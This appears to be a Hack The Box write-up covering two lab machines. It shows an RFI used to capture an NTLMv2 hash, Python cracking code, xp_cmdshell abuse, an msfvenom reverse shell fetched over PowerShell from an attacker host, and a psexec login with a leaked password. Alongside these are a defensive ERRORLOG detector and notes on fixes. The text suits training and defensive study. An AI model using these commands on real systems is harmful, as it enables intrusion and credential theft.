# HTB Starting Point (Windows)

## Responder

Note: the target IP was changed partway through (the box was re-spawned), so the addresses in the commands below differ between sections.

### Enumeration

```bash
└─$ rustscan -a 10.129.80.176 --ulimit 5000
...
PORT     STATE SERVICE REASON
80/tcp   open  http    syn-ack ttl 127
5985/tcp open  wsman   syn-ack ttl 127   # WinRM

└─$ nmap 10.129.80.176 -p 80,5985 -sC -sV
...
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

Opening http://10.129.80.176 in a browser does not give the real site:
(screenshot)
Presumably name-based virtual hosting: the backend checks the Host header and expects the hostname unika.htb, so add it to /etc/hosts:

```bash
└─$ echo "10.129.80.176 unika.htb" | sudo tee -a /etc/hosts
```
![image](https://hackmd.io/_uploads/SyoQCKMxxx.png)
### LFI
![image](https://hackmd.io/_uploads/SJ6NRYMele.png)
Switching the site language loads a different page through a URL parameter, and that parameter accepts arbitrary paths, so local files can be read (LFI):
![image](https://hackmd.io/_uploads/Sk9HCYGexe.png)
![image](https://hackmd.io/_uploads/Hy2LRFzele.png)
![image](https://hackmd.io/_uploads/rkDcCFMlgx.png)
### RFI: capturing the NTLMv2 hash with Responder
Since the include path is controllable, try an RFI that points at a UNC path on the attacker host, so the web server authenticates to us over SMB and we can capture the NTLMv2 response with Responder:

```bash
└─$ sudo responder -I tun0
```

![image](https://hackmd.io/_uploads/rks-yqzglx.png)
![image](https://hackmd.io/_uploads/rJZ719zgel.png)

Save the captured line (the full hash is elided here) and crack it with john:

```bash
└─$ echo "Administrator::RESPONDER:4a95d07b969fd..." > hash.txt
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
...
badminton        (Administrator)
...
```
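What john is doing with that line, as an added example that is not from the writeup: a Responder capture has the form `User::Domain:ServerChallenge:NTProofStr:Blob`, and each rockyou candidate is checked by recomputing NTProofStr = HMAC-MD5(HMAC-MD5(MD4(UTF-16LE(password)), UTF-16LE(upper(User) + Domain)), ServerChallenge + Blob). The Python below implements that check. The capture line it tests is constructed from a made-up challenge and blob (the real hash from the box is not on this page), and `make_capture`, `check_password` and `crack` are names chosen here, not tool APIs. MD4 is written out because hashlib has no md4 on OpenSSL 3 builds.

```python
"""
Added example (not part of the writeup): the per-candidate check john performs
on a captured NTLMv2 line.

    User::Domain:ServerChallenge:NTProofStr:Blob      (hex fields)

    NT      = MD4(UTF-16LE(password))
    NTLMv2  = HMAC-MD5(NT, UTF-16LE(upper(User) + Domain))
    NTProof = HMAC-MD5(NTLMv2, ServerChallenge + Blob)

SAMPLE_LINE is CONSTRUCTED (made-up challenge and blob); it is not the box's hash.
"""
import hashlib
import hmac
import struct


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320: little-endian words, three 16-step rounds."""
    mask = 0xFFFFFFFF

    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & mask

    def f(x, y, z):
        return (x & y) | (~x & z)

    def g(x, y, z):
        return (x & y) | (x & z) | (y & z)

    def h(x, y, z):
        return x ^ y ^ z

    bit_len = len(data) * 8
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):                                   # round 1
            a = rotl((a + f(b, c, d) + x[i]) & mask, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                   # round 2
            k = (i % 4) * 4 + i // 4
            a = rotl((a + g(b, c, d) + x[k] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                   # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a0, b0, c0, d0 = (a0 + a) & mask, (b0 + b) & mask, (c0 + c) & mask, (d0 + d) & mask
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> bytes:
    """The NT hash: MD4 over the UTF-16LE password, no salt."""
    return md4(password.encode("utf-16-le"))


def nt_proof(password: str, user: str, domain: str, challenge: bytes, blob: bytes) -> bytes:
    """Recompute NTProofStr for a candidate password."""
    ntlmv2_key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(ntlmv2_key, challenge + blob, hashlib.md5).digest()


def parse_capture(line: str):
    """Split a Responder/john NTLMv2 line into user, domain, challenge, proof, blob."""
    user, _, rest = line.strip().partition("::")
    domain, challenge, proof, blob = rest.split(":", 3)
    return user, domain, bytes.fromhex(challenge), bytes.fromhex(proof), bytes.fromhex(blob)


def check_password(line: str, candidate: str) -> bool:
    user, domain, challenge, proof, blob = parse_capture(line)
    return hmac.compare_digest(nt_proof(candidate, user, domain, challenge, blob), proof)


def crack(line: str, wordlist):
    """First candidate that reproduces NTProofStr, or None (what john does with rockyou)."""
    for word in wordlist:
        if check_password(line, word):
            return word
    return None


def make_capture(user: str, domain: str, password: str, challenge: bytes, blob: bytes) -> str:
    """Build a line the way the client plus Responder would; only used for the constructed sample."""
    proof = nt_proof(password, user, domain, challenge, blob)
    return f"{user}::{domain}:{challenge.hex()}:{proof.hex()}:{blob.hex()}"


# Constructed sample: 8-byte server challenge and a minimal NTLMv2 blob
# (version header, zero timestamp, client nonce, reserved, terminator).
SAMPLE_CHALLENGE = bytes.fromhex("1122334455667788")
SAMPLE_BLOB = bytes.fromhex("0101000000000000" + "00" * 8 + "a1b2c3d4e5f60718" + "00000000" + "00000000")
SAMPLE_LINE = make_capture("Administrator", "RESPONDER", "badminton", SAMPLE_CHALLENGE, SAMPLE_BLOB)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack(SAMPLE_LINE, ["password", "letmein", "badminton"]))
```

Pointing `crack` at the real hash.txt line and rockyou.txt is the equivalent of the john run above, only far slower in pure Python, which is why john or hashcat (mode 5600) is the tool for this. The blob carries a client nonce and timestamp and the proof is bound to the server's challenge, so a captured line can only be cracked offline, not replayed later; the unsalted NT hash underneath is what makes a short password like this one fall to a wordlist.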

### WinRM

The hash came from the account Apache runs as, which here is Administrator, and WinRM (5985) is open, so the cracked password logs straight in (note the new target IP):

```bash
└─$ evil-winrm -i 10.129.134.106 -u Administrator -p badminton
*Evil-WinRM* PS C:\Users\Administrator\Documents>
```

After looking around the filesystem:
(screenshot)
(screenshot)

## Archetype

### Enumeration

```bash
└─$ rustscan -a 10.129.128.154 --ulimit 5000
PORT     STATE SERVICE      REASON
135/tcp  open  msrpc        syn-ack ttl 127
139/tcp  open  netbios-ssn  syn-ack ttl 127
445/tcp  open  microsoft-ds syn-ack ttl 127
1433/tcp open  ms-sql-s     syn-ack ttl 127
5985/tcp open  wsman        syn-ack ttl 127

└─$ nmap 10.129.128.154 -p 135,139,445,1433,5985 -sC -sV
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
|   10.129.128.154:1433:
|     Target_Name: ARCHETYPE
|     NetBIOS_Domain_Name: ARCHETYPE
|     NetBIOS_Computer_Name: ARCHETYPE
|     DNS_Domain_Name: Archetype
|     DNS_Computer_Name: Archetype
|_    Product_Version: 10.0.17763
| ms-sql-info:
|   10.129.128.154:1433:
|     Version:
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-12-11T06:16:46
|_Not valid after:  2054-12-11T06:16:46
|_ssl-date: 2024-12-11T06:28:15+00:00; +1s from scanner time.
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-12-10T22:27:59-08:00
|_clock-skew: mean: 1h36m01s, deviation: 3h34m41s, median: 0s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2024-12-11T06:27:57
|_  start_date: N/A
```

Two leads: SMB accepts the guest account (smb-security-mode above), and SQL Server 2017 is at RTM with no patches. Browsing the shares as guest turns up the SQL Server credentials for sql_svc:
(screenshot)
(screenshot)
(screenshot)

### Foothold

Connect to MSSQL as sql_svc and check which server role the login has; `1` means it is a member of sysadmin, which is what makes the rest of this section possible:

```
SQL (ARCHETYPE\sql_svc  dbo@master)> SELECT is_srvrolemember('sysadmin');

-
1
```

Check whether xp_cmdshell is enabled:

```
SQL (ARCHETYPE\sql_svc  dbo@master)> EXEC xp_cmdshell 'net user';
ERROR(ARCHETYPE): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
```

Enable xp_cmdshell. The error message itself says a sysadmin can do this with sp_configure; xp_cmdshell is an advanced option, so advanced options have to be shown first:

```sql
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
sp_configure;  -- list the options: xp_cmdshell is now visible, as the error message above hinted
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
```
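The defender's side of those statements, as an added example that is not part of the writeup: SQL Server writes every sp_configure change to the ERRORLOG as `Configuration option '<name>' changed from X to Y.` under the spid of the session that ran it, so one session turning on `show advanced options` and then `xp_cmdshell` is a clear signature of the sequence above. The Python below parses constructed ERRORLOG lines (the dates, spid numbers and the other entries are made up to match the real line format) and flags that sequence; `parse_config_changes`, `find_risky_enables` and the `RISKY_OPTIONS` set are choices made here, not SQL Server or vendor names.

```python
"""
Added example, not from the writeup: detect the xp_cmdshell enable sequence in
the SQL Server ERRORLOG.  Each sp_configure change is logged as

  <timestamp> spidNN  Configuration option '<name>' changed from X to Y. Run the RECONFIGURE statement to install.

attributed to the session that ran it.  SAMPLE_ERRORLOG is CONSTRUCTED in that
format; dates, spid numbers and the unrelated entries are made up.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_ERRORLOG = """\
2024-12-11 06:30:01.10 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-12-11 06:30:01.45 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-12-11 06:31:12.00 spid55      Configuration option 'show advanced options' changed from 1 to 0. Run the RECONFIGURE statement to install.
2024-12-11 07:02:40.00 spid61      Configuration option 'max server memory (MB)' changed from 2147483647 to 8192. Run the RECONFIGURE statement to install.
2024-12-11 07:15:00.00 spid70      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-12-11 08:00:00.00 spid80      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
"""

CONFIG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Options that let a login run code outside the engine once switched on.
RISKY_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures", "clr enabled", "Ad Hoc Distributed Queries"}


def parse_config_changes(log_text):
    """Return the configuration-change lines as dicts; other ERRORLOG lines are ignored."""
    events = []
    for line in log_text.splitlines():
        m = CONFIG_RE.match(line)
        if m:
            events.append({
                "ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"),
                "spid": m["spid"],
                "option": m["option"],
                "old": int(m["old"]),
                "new": int(m["new"]),
            })
    return events


def find_risky_enables(events, window=timedelta(minutes=5)):
    """
    One finding per risky option switched from 0 to 1.  'show advanced options'
    on its own is noise (DBAs toggle it), so it is only recorded as context:
    advanced_options_first is True when the same spid turned it on within
    `window` before the risky change, which is exactly the sequence in the writeup.
    """
    by_spid = defaultdict(list)
    for ev in events:
        by_spid[ev["spid"]].append(ev)
    findings = []
    for spid, evs in by_spid.items():
        advanced_on = [e["ts"] for e in evs if e["option"] == "show advanced options" and e["new"] == 1]
        for e in evs:
            if e["option"] in RISKY_OPTIONS and e["old"] == 0 and e["new"] == 1:
                preceded = any(timedelta(0) <= e["ts"] - t <= window for t in advanced_on)
                findings.append({"spid": spid, "option": e["option"], "ts": e["ts"],
                                 "advanced_options_first": preceded})
    return findings


if __name__ == "__main__":
    for hit in find_risky_enables(parse_config_changes(SAMPLE_ERRORLOG)):
        print(hit)
```

In the constructed log, spid55 is the attacker pattern (advanced options and xp_cmdshell within a second of each other), spid80 still gets a finding because `show advanced options` is server-wide and may already be on from another session. Turning the option back off is `EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;`, but any sysadmin login can re-enable it, so the durable fix on a box like this one is not granting sysadmin to a service account and not leaving that account's credentials on a guest-readable share.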

Build a reverse shell payload (and start a listener on port 443 on the attacker host before running it):

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.52 LPORT=443 -f exe -o reverse.exe
```

Commands run through xp_cmdshell execute as the SQL Server service account, which has no permission to write files in its current directory:
(screenshot)
Try sql_svc's home directory instead. Serve reverse.exe over HTTP on port 8000 from the attacker host and fetch it with PowerShell (`wget` is an alias for Invoke-WebRequest here). The `NULL` row is expected: the download produces no stdout.

```
SQL (ARCHETYPE\sql_svc  dbo@master)> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads;wget http://10.10.14.52:8000/reverse.exe -outfile reverse.exe"
output
------
NULL
```

(screenshot)

Run it; the listener receives the shell:

```
SQL (ARCHETYPE\sql_svc  dbo@master)> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads;.\reverse.exe"
output
------
NULL
```

(screenshot)
Got the user flag:
(screenshot)

### Privilege Escalation

Enumerate with winPEAS, fetched the same way as the payload:

```
C:\Users\sql_svc\Downloads>powershell -c wget http://10.10.14.52:8000/winPEASx64.exe -outfile winPEASx64.exe
C:\Users\sql_svc\Downloads>.\winPEASx64.exe
```

The winPEAS output turns up the administrator's password:
(screenshot)
(screenshot)

SMB (445) is open, so impacket's psexec.py gives a SYSTEM shell with it (note the target IP changed again):

```bash
$ psexec.py administrator@10.129.157.196
Password: MEGACORP_4dm1n!!
```

Got the root flag:
(screenshot)